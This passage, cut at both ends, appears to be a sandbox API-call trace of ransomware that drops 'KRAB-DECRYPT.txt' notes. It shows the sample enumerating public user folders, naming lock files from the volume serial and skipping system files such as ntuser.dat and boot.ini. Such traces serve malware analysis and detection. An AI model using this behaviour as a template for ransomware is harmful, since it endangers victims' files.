"c:\\users\\public\\music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0101.376] GetLastError () returned 0x50 [0101.376] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.376] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.377] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x23f)) [0101.377] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.377] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.377] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.377] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock") returned 45 [0101.377] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.378] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.378] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.378] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0101.378] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0101.378] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbe0a0 [0101.378] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.379] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.379] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.379] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.379] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.379] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.379] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.379] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock" [0101.379] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.379] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 50 [0101.379] lstrlenW (lpString="C:\\Users\\Public\\Music\\d2ca4a08d2ca4dee3d.lock") returned 45 [0101.379] lstrlenW (lpString=".lock") returned 5 [0101.379] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.379] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.379] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.380] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.380] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.380] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.380] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.380] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Music\\desktop.ini") returned="C:\\Users\\Public\\Music\\desktop.ini" [0101.380] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.380] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Music\\desktop.ini.KRAB") returned 38 [0101.380] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0101.380] lstrlenW (lpString=".ini") returned 4 [0101.380] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.381] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.381] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.381] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0101.381] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0101.381] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.381] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.381] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.381] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.381] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.381] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt" [0101.381] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.382] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt.KRAB") returned 43 [0101.382] lstrlenW (lpString="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt") returned 38 [0101.382] lstrlenW (lpString=".txt") returned 4 [0101.382] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.382] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.382] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.382] lstrlenW (lpString="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt") returned 38 [0101.382] lstrlenW (lpString="C:\\Users\\Public\\Music\\KRAB-DECRYPT.txt") returned 38 [0101.382] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.383] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.383] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.383] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.383] FindClose (in: hFindFile=0xfbe0a0 | out: hFindFile=0xfbe0a0) returned 1 [0101.383] CloseHandle (hObject=0x320) returned 1 [0101.383] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.383] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0101.383] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0101.383] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0101.383] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0101.383] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.384] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.420] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.420] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Pictures\\\\KRAB-DECRYPT.txt") returned 42 [0101.420] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0101.422] GetLastError () returned 0x50 [0101.422] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.422] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.426] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x270)) [0101.426] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.429] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.430] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.430] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 48 [0101.430] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.437] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.437] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.438] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0101.438] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0101.438] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0101.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.438] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.438] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.438] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.438] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.438] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock" [0101.438] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.439] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 53 [0101.439] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 48 [0101.439] lstrlenW (lpString=".lock") returned 5 [0101.439] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.439] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.439] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.439] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.440] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.440] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.440] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.440] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Pictures\\desktop.ini") returned="C:\\Users\\Public\\Pictures\\desktop.ini" [0101.440] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.440] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Pictures\\desktop.ini.KRAB") returned 41 [0101.440] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0101.440] lstrlenW (lpString=".ini") returned 4 [0101.440] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.440] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.441] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.441] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0101.441] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\desktop.ini") returned 36 [0101.441] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.441] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.441] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.441] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.441] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.441] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt" [0101.441] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.442] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt.KRAB") returned 46 [0101.442] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt") returned 41 [0101.442] lstrlenW (lpString=".txt") returned 4 [0101.442] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.442] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0101.442] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.442] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt") returned 41 [0101.442] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\KRAB-DECRYPT.txt") returned 41 [0101.442] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0101.442] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0101.442] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0101.442] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0101.442] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0101.443] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0101.443] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0101.443] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0101.443] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0101.443] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0101.443] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.443] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0101.443] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0101.443] CloseHandle (hObject=0x320) returned 1 [0101.443] FindNextFileW (in: hFindFile=0xfbdfe0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0101.443] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0101.443] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0101.443] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos" | out: lpString1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0101.443] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0101.443] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0101.444] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0101.444] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0101.444] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0101.444] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0101.444] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.444] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.444] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Public\\Videos\\\\KRAB-DECRYPT.txt") returned 40 [0101.445] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\public\\videos\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0101.445] GetLastError () returned 0x50 [0101.445] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.445] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.445] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x283)) [0101.445] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.446] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.446] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.446] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 46 [0101.446] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\public\\videos\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0101.446] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.447] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.447] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0101.447] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0101.447] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0101.447] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0101.447] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.447] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0101.447] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0101.447] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.447] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0101.447] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0101.447] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock" [0101.447] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.448] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 51 [0101.448] lstrlenW (lpString="C:\\Users\\Public\\Videos\\d2ca4a08d2ca4dee3d.lock") returned 46 [0101.448] lstrlenW (lpString=".lock") returned 5 [0101.448] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.448] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0101.448] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.448] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.449] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.449] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0101.449] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0101.449] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\Videos\\desktop.ini") returned="C:\\Users\\Public\\Videos\\desktop.ini" [0101.449] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.449] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Public\\Videos\\desktop.ini.KRAB") returned 39 [0101.449] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0101.449] lstrlenW (lpString=".ini") returned 4 [0101.449] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0101.449] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0101.449] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.450] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0101.450] lstrlenW (lpString="C:\\Users\\Public\\Videos\\desktop.ini") returned 34 [0101.450] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0101.450] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.450] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0101.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0101.450] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0101.450] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt") returned="C:\\Users\\Public\\Videos\\KRAB-DECRYPT.txt" [0101.450] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0101.450] wsprintfW (in: 